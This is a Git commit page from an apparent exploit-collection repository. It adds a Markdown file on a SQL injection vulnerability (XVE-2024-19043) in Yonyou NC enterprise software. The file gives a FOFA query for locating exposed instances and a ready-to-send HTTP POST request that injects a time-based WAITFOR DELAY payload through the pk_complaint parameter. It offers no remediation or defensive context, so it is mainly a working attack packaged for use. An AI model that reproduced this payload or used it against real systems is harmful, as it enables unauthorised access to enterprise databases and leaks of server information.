dontian122/POC
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

8.4更新漏洞

Browse Source
This commit is contained in:
wy876
2024-08-04 11:27:35 +08:00
parent f228c4e964
commit d672fb7281
16 changed files with 468 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

22
用友NC系统complainjudge接口SQL注入漏洞(XVE-2024-19043).md Normal file
View File

@@ -0,0 +1,22 @@
# 用友NC系统complainjudge接口SQL注入漏洞(XVE-2024-19043)
用友NC是由用友公司开发的一套面向大型企业和集团型企业的管理软件产品系列。 用友NC系统/ebvp/advorappcoll/complainbilldetail和complainjudge接口的pk_complaint参数存在SQL注入攻击者能够通过该漏洞获取泄露服务器信息。
## fofa
```yaml
app="用友-UFIDA-NC
```
## poc
```java
POST /ebvp/advorappcoll/complainjudge HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
pageId=login&pk_complaint=11%27;WAITFOR%20DELAY%20%270:0:5%27--
```